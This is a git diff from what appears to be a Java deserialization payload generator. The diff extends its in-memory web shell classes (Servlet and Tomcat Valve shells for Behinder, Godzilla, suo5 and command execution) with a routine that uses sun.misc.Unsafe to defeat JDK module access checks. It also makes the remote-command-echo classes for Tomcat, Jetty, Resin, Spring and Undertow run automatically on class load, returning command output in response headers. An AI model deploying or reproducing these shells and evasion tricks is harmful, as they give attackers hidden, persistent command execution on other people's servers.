@MemShell(MemShell.Servlet)
@MemShellFunction(MemShellFunction.sou5)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ServletSuo5 implements InvocationHandler, Runnable, HostnameVerifier, X509TrustManager {
public static HashMap addrs = collectAddr();
@@ -54,6 +58,7 @@ public Object getResponse(Object httpServletRequest) throws Exception {
private void service(Object request, Object response) {
try {
+ addModule();
String lv = (String) invokeMethod(request, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -591,6 +596,25 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
return object;
}
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ServletSuo5.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
+
@Override
public boolean verify(String hostname, SSLSession session) {
return false;
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveBehinder.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveBehinder.java
index 787d753..f7006c3 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveBehinder.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveBehinder.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -17,6 +20,7 @@
*/
@MemShell(MemShell.Valve)
@MemShellFunction(MemShellFunction.Behinder)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ValveBehinder implements InvocationHandler {
private static String pass;
@@ -48,6 +52,7 @@ public Object invoke(Object proxy, Method method, Object[] args) throws Exceptio
private void run(Object servletRequest, Object servletResponse) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -124,4 +129,23 @@ public static Object invokeMethod(Class cls, Object obj, String methodName, Clas
Object object = method.invoke(obj, args);
return object;
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ValveBehinder.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveExec.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveExec.java
index a88869f..b863897 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveExec.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveExec.java
@@ -4,6 +4,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.io.InputStream;
import java.lang.reflect.Field;
@@ -16,6 +19,7 @@
*/
@MemShell(MemShell.Valve)
@MemShellFunction(MemShellFunction.Exec)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.HEADER, JavaClassModifiable.RHEADER, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ValveExec implements InvocationHandler {
@@ -51,6 +55,7 @@ public Object invoke(Object proxy, Method method, Object[] args) throws Exceptio
private void run(Object servletRequest, Object servletResponse) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -112,4 +117,23 @@ public static Object invokeMethod(Object obj, String methodName, Class[] argsCla
method.setAccessible(true);
return method.invoke(obj, args);
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ValveExec.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveGodzilla.java b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveGodzilla.java
index 648e3c7..4b3aeb0 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveGodzilla.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/memshell/ValveGodzilla.java
@@ -3,6 +3,9 @@
import com.ppp.annotation.JavaClassModifiable;
import com.ppp.annotation.MemShell;
import com.ppp.annotation.MemShellFunction;
+import com.ppp.annotation.MemShellType;
+import com.ppp.middleware.loader.SpringInterceptorContextLoader;
+import sun.misc.Unsafe;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
@@ -15,6 +18,7 @@
*/
@MemShell(MemShell.Valve)
@MemShellFunction(MemShellFunction.Godzilla)
+@MemShellType(MemShellType.Default)
@JavaClassModifiable({JavaClassModifiable.key, JavaClassModifiable.pass, JavaClassModifiable.lockHeaderKey, JavaClassModifiable.lockHeaderValue})
public class ValveGodzilla implements InvocationHandler {
public static String key; // key
@@ -44,6 +48,7 @@ public Object invoke(Object proxy, Method method, Object[] args) throws Exceptio
private void run(Object servletRequest, Object servletResponse) {
try {
+ addModule();
String lv = (String) invokeMethod(servletRequest, "getHeader", new Class[]{String.class}, new Object[]{lockHeaderKey});
if (lv == null || !lv.contains(lockHeaderValue)) {
return;
@@ -165,4 +170,23 @@ public static Object invokeMethod(Object obj, String methodName, Class[] argsCla
method.setAccessible(true);
return method.invoke(obj, args);
}
+
+ public static void addModule() {
+ try {
+ Class unsafeClass = Class.forName("sun.misc.Unsafe");
+ Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+ unsafeField.setAccessible(true);
+ Unsafe unsafe = (Unsafe) unsafeField.get(null);
+ Method method = Class.class.getDeclaredMethod("getModule");
+ method.setAccessible(true);
+ Object module = method.invoke(Object.class);
+ Class cls = ValveGodzilla.class;
+ long offset = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
+ Method getAndSetObjectMethod = unsafeClass.getMethod("getAndSetObject", Object.class, long.class, Object.class);
+ getAndSetObjectMethod.setAccessible(true);
+ getAndSetObjectMethod.invoke(unsafe, cls, offset, module);
+ } catch (Exception e) {
+
+ }
+ }
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/JettyRE.java b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/JettyRE.java
index c1ee61f..fb18284 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/JettyRE.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/JettyRE.java
@@ -29,6 +29,10 @@ public class JettyRE {
private static String HEADER;
private static String RHEADER;
+ static {
+ new JettyRE();
+ }
+
public JettyRE() {
try {
Object threadLocals = getFieldValue(Thread.currentThread(), "threadLocals");
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/ResinRE.java b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/ResinRE.java
index f9662c9..23b6153 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/ResinRE.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/ResinRE.java
@@ -28,6 +28,9 @@ public class ResinRE {
private static String HEADER;
private static String RHEADER;
+ static {
+ new ResinRE();
+ }
public ResinRE() {
try {
Object threadLocals = getFieldValue(Thread.currentThread(), "threadLocals");
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/SpringRE.java b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/SpringRE.java
index ef76e0b..5c1cb6f 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/SpringRE.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/SpringRE.java
@@ -19,6 +19,10 @@
@JavaClassModifiable({JavaClassModifiable.HEADER, JavaClassModifiable.RHEADER})
public class SpringRE {
public static String HEADER;
+ public static String RHEADER;
+ static {
+ new SpringRE();
+ }
public SpringRE() {
try {
@@ -31,7 +35,7 @@ public SpringRE() {
if (header != null && !header.isEmpty()) {
String result = exec(header);
// 输出到头
- invokeMethod(response, "setHeader", new Class[]{String.class, String.class}, new Object[]{HEADER, result});
+ invokeMethod(response, "setHeader", new Class[]{String.class, String.class}, new Object[]{RHEADER, result});
// invokeMethod(response, "setStatus", new Class[]{Integer.TYPE}, new Object[]{new Integer(200)});
// // 有 shiro 情况不一样了
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/TomcatAutoRE.java b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/TomcatAutoRE.java
index b27f001..dbcda7c 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/TomcatAutoRE.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/TomcatAutoRE.java
@@ -20,6 +20,9 @@ public class TomcatAutoRE {
private static String HEADER;
private static String RHEADER;
+ static {
+ new TomcatAutoRE();
+ }
public TomcatAutoRE(Object o) {
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/TomcatRE.java b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/TomcatRE.java
index 642aff1..a36c7c7 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/TomcatRE.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/TomcatRE.java
@@ -33,6 +33,9 @@
public class TomcatRE {
private static String HEADER;
private static String RHEADER;
+ static {
+ new TomcatRE();
+ }
public TomcatRE() {
try {
diff --git a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/UndertowRE.java b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/UndertowRE.java
index b4c24e0..712d107 100644
--- a/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/UndertowRE.java
+++ b/javaClassBuilder/src/main/java/com/ppp/middleware/rceecho/UndertowRE.java
@@ -21,6 +21,9 @@ public class UndertowRE {
private static String HEADER;
private static String RHEADER;
+ static {
+ new UndertowRE();
+ }
public UndertowRE() {
try {
Object threadLocals = getFieldValue(Thread.currentThread(), "threadLocals");
diff --git a/javaClassBuilder/src/main/java/com/ppp/scheduler/MemShellScheduler.java b/javaClassBuilder/src/main/java/com/ppp/scheduler/MemShellScheduler.java
index e63a8a4..7d1b7ec 100644
--- a/javaClassBuilder/src/main/java/com/ppp/scheduler/MemShellScheduler.java
+++ b/javaClassBuilder/src/main/java/com/ppp/scheduler/MemShellScheduler.java
@@ -38,6 +38,7 @@ public static byte[] build(JavaClassHelper javaClassHelper) throws Exception {
String memShell = javaClassHelper.getMemShell();
String memShellFunction = javaClassHelper.getMemShellFunction();
String javaClassType = javaClassHelper.getJavaClassType();
+ String memShellType = javaClassHelper.getMemShellType();
// 用于打印信息
@@ -157,12 +158,16 @@ public static byte[] build(JavaClassHelper javaClassHelper) throws Exception {
MemShellFunction memShellFunctionAnnotation = clazz.getAnnotation(MemShellFunction.class);
if (memShellFunctionAnnotation == null) continue;
+ MemShellType memShellTypeAnnotation = clazz.getAnnotation(MemShellType.class);
+ if (memShellTypeAnnotation == null) continue;
+
if (
memShellAnnotation.value().equalsIgnoreCase(memShell)
&& memShellFunctionAnnotation.value().equalsIgnoreCase(memShellFunction)
+ && memShellTypeAnnotation.value().equalsIgnoreCase(memShellType)
) {
msClass = clazz;
- Printer.log("MemShell Class: " + clazz.getName() + ", Annotation Value: " + memShellAnnotation.value());
+ Printer.log("MemShell Class: " + clazz.getName() + ", Annotation Value: " + memShellAnnotation.value() + " , MemShellFunction: " + memShellFunctionAnnotation.value() + " , MemShellType: " + memShellTypeAnnotation.value());
break;
}
diff --git a/javaClassBuilder/src/main/java/com/ppp/scheduler/RceEchoScheduler.java b/javaClassBuilder/src/main/java/com/ppp/scheduler/RceEchoScheduler.java
index 8b0387d..a4d08dd 100644
--- a/javaClassBuilder/src/main/java/com/ppp/scheduler/RceEchoScheduler.java
+++ b/javaClassBuilder/src/main/java/com/ppp/scheduler/RceEchoScheduler.java
@@ -40,7 +40,7 @@ public static byte[] build(JavaClassHelper javaClassHelper) throws Exception {
// 获取 RceEcho Builder
if (builder.value().equalsIgnoreCase(Builder.RceEcho)) {
rceEchoClass = clazz;
- Printer.log("RceEcho builder Class: " + clazz.getName() + ", Annotation Value: " + builder.value());
+// Printer.log("RceEcho builder Class: " + clazz.getName() + ", Annotation Value: " + builder.value());
break;
}
}
@@ -64,7 +64,7 @@ public static byte[] build(JavaClassHelper javaClassHelper) throws Exception {
if (middlewareAnnotation.value().equalsIgnoreCase(middleware) && javaClassTypeAnnotation.value().equalsIgnoreCase(javaClassType)) {
recEchoJavaClass = clazz;
- Printer.blueInfo("RceEcho Class: " + clazz.getName() + " , Annotation Value: " + middlewareAnnotation.value() + " , JavaClassType: " + javaClassTypeAnnotation.value());
+ Printer.log("RceEcho Class: " + clazz.getName() + " , Annotation Value: " + middlewareAnnotation.value() + " , JavaClassType: " + javaClassTypeAnnotation.value());
break;
}
}
diff --git a/scheduler/pom.xml b/scheduler/pom.xml
index 733e15d..5c62c9e 100644
--- a/scheduler/pom.xml
+++ b/scheduler/pom.xml
@@ -4,7 +4,7 @@
com.ppp
scheduler
- 1.1.0
+ 1.2.0
jar
scheduler
diff --git a/scheduler/src/main/java/com/ppp/CliOptions.java b/scheduler/src/main/java/com/ppp/CliOptions.java
index 1aeac2f..820ec0f 100644
--- a/scheduler/src/main/java/com/ppp/CliOptions.java
+++ b/scheduler/src/main/java/com/ppp/CliOptions.java
@@ -53,11 +53,13 @@ public enum CliOptions {
ExtendsAbstractTranslet("ext", "extendsAbstractTranslet", "Extends AbstractTranslet"),
JavaClassHelperType("jht", "javaClassHelperType", "eg. [MemShell | RceEcho | Custom]"),
JavaClassFilePath("jfp", "javaClassFilePath", "Local JavaClass from local file path"),
- JavaClassEnhance("je", "javaClassEnhance", "eg. [FreeMarker]"),
- JavaClassType("jt", "javaClassType", "[AutoFind | Default]"),
+ JavaClassEnhance("je", "javaClassEnhance", "eg. [Script | SPEL | FreeMarker]"),
+ JavaClassMakerEnhance("jme", "javaClassMakerEnhance", "eg. [JDK17]"),
+ JavaClassType("jt", "javaClassType", "eg. [AutoFind]"),
Middleware("mw", "middleware", "eg. [Tomcat | Jetty ...]"),
MemShell("ms", "memShell", "eg. [Servlet | Listener | Filter ...]"),
MemShellFunction("msf", "memShellFunction", "eg. [Exec | Godzilla ...]"),
+ MemShellType("mt", "memShellType", "eg. [Raw]"),
// JavaClass Field 修改
FieldNAME("fname", "fieldName", "Modify the field NAME"),
diff --git a/scheduler/src/main/java/com/ppp/CliScheduler.java b/scheduler/src/main/java/com/ppp/CliScheduler.java
index 52f62dd..05f041e 100644
--- a/scheduler/src/main/java/com/ppp/CliScheduler.java
+++ b/scheduler/src/main/java/com/ppp/CliScheduler.java
@@ -60,11 +60,13 @@ public static Class run(String[] args, SinksHelper sinksHelper) throws Exception
options.addOption(CliOptions.ExtendsAbstractTranslet.getOpt(), CliOptions.ExtendsAbstractTranslet.getLongOpt(), false, CliOptions.ExtendsAbstractTranslet.getDescription());
options.addOption(CliOptions.JavaClassHelperType.getOpt(), CliOptions.JavaClassHelperType.getLongOpt(), true, CliOptions.JavaClassHelperType.getDescription());
options.addOption(CliOptions.JavaClassEnhance.getOpt(), CliOptions.JavaClassEnhance.getLongOpt(), true, CliOptions.JavaClassEnhance.getDescription());
+ options.addOption(CliOptions.JavaClassMakerEnhance.getOpt(), CliOptions.JavaClassMakerEnhance.getLongOpt(), true, CliOptions.JavaClassMakerEnhance.getDescription());
options.addOption(CliOptions.JavaClassFilePath.getOpt(), CliOptions.JavaClassFilePath.getLongOpt(), true, CliOptions.JavaClassFilePath.getDescription());
options.addOption(CliOptions.JavaClassType.getOpt(), CliOptions.JavaClassType.getLongOpt(), true, CliOptions.JavaClassType.getDescription());
options.addOption(CliOptions.Middleware.getOpt(), CliOptions.Middleware.getLongOpt(), true, CliOptions.Middleware.getDescription());
options.addOption(CliOptions.MemShell.getOpt(), CliOptions.MemShell.getLongOpt(), true, CliOptions.MemShell.getDescription());
options.addOption(CliOptions.MemShellFunction.getOpt(), CliOptions.MemShellFunction.getLongOpt(), true, CliOptions.MemShellFunction.getDescription());
+ options.addOption(CliOptions.MemShellType.getOpt(), CliOptions.MemShellType.getLongOpt(), true, CliOptions.MemShellType.getDescription());
// JavaClass 自定义字段
options.addOption(CliOptions.FieldNAME.getOpt(), CliOptions.FieldNAME.getLongOpt(), true, CliOptions.FieldNAME.getDescription());
options.addOption(CliOptions.FieldHEADER.getOpt(), CliOptions.FieldHEADER.getLongOpt(), true, CliOptions.FieldHEADER.getDescription());
diff --git a/scheduler/src/main/java/com/ppp/Scheduler.java b/scheduler/src/main/java/com/ppp/Scheduler.java
index f43f6ca..9ce03f8 100644
--- a/scheduler/src/main/java/com/ppp/Scheduler.java
+++ b/scheduler/src/main/java/com/ppp/Scheduler.java
@@ -255,7 +255,16 @@ public static void enchantJavaClass(SinksHelper sinksHelper, Map javaClassHelper
} else {
javaClassHelper.setJavaClassType(JavaClassType.Utils.getJavaClassType((String) javaClassHelperMap.get(CliOptions.JavaClassType.getLongOpt())));
javaClassHelper.setMiddleware(Middleware.Utils.getMiddleware((String) javaClassHelperMap.get(CliOptions.Middleware.getLongOpt())));
- javaClassHelper.setJavaClassEnhance(JavaClassEnhance.getJavaClassEnhanceEnums((String) javaClassHelperMap.get(CliOptions.JavaClassEnhance.getLongOpt())));
+ Object javaClassEnhance = javaClassHelperMap.get(CliOptions.JavaClassEnhance.getLongOpt());
+ if (javaClassEnhance != null) {
+ javaClassHelper.setJavaClassEnhances(JavaClassEnhance.splitJavaClassEnhance((String) javaClassEnhance));
+ }
+
+ Object javaClassMakerEnhance = javaClassHelperMap.get(CliOptions.JavaClassMakerEnhance.getLongOpt());
+ if (javaClassMakerEnhance != null) {
+ javaClassHelper.setJavaClassMakerEnhances(JavaClassMakerEnhance.splitJavaClassMakerEnhance((String) javaClassMakerEnhance));
+ }
+
if (javaClassHelperType.equalsIgnoreCase(JavaClassHelperType.MemShell)) {
String memShell = MemShell.Utils.getMemShell((String) javaClassHelperMap.get(CliOptions.MemShell.getLongOpt()));
@@ -270,6 +279,7 @@ public static void enchantJavaClass(SinksHelper sinksHelper, Map javaClassHelper
Printer.error(String.format("MemShellFunction is null, use -%s to set", CliOptions.MemShellFunction.getOpt()));
}
javaClassHelper.setMemShellFunction(memShellFunction);
+ javaClassHelper.setMemShellType(MemShellType.Utils.getJavaClassType((String) javaClassHelperMap.get(CliOptions.MemShellType.getLongOpt())));
}
String fieldName = (String) javaClassHelperMap.get(CliOptions.FieldNAME.getLongOpt());
diff --git a/scheduler/src/main/resources/PPPConfig.yml b/scheduler/src/main/resources/PPPConfig.yml
index 2818350..253535b 100644
--- a/scheduler/src/main/resources/PPPConfig.yml
+++ b/scheduler/src/main/resources/PPPConfig.yml
@@ -88,6 +88,10 @@ PPPYSO:
javaClassType:
# 用于封装生成的 JavaClass,eg. [FreeMarker]
javaClassEnhance:
+ # 特殊生成
+ javaClassMakerEnhance:
+ #
+ memShellType:
# 组件
middleware: Tomcat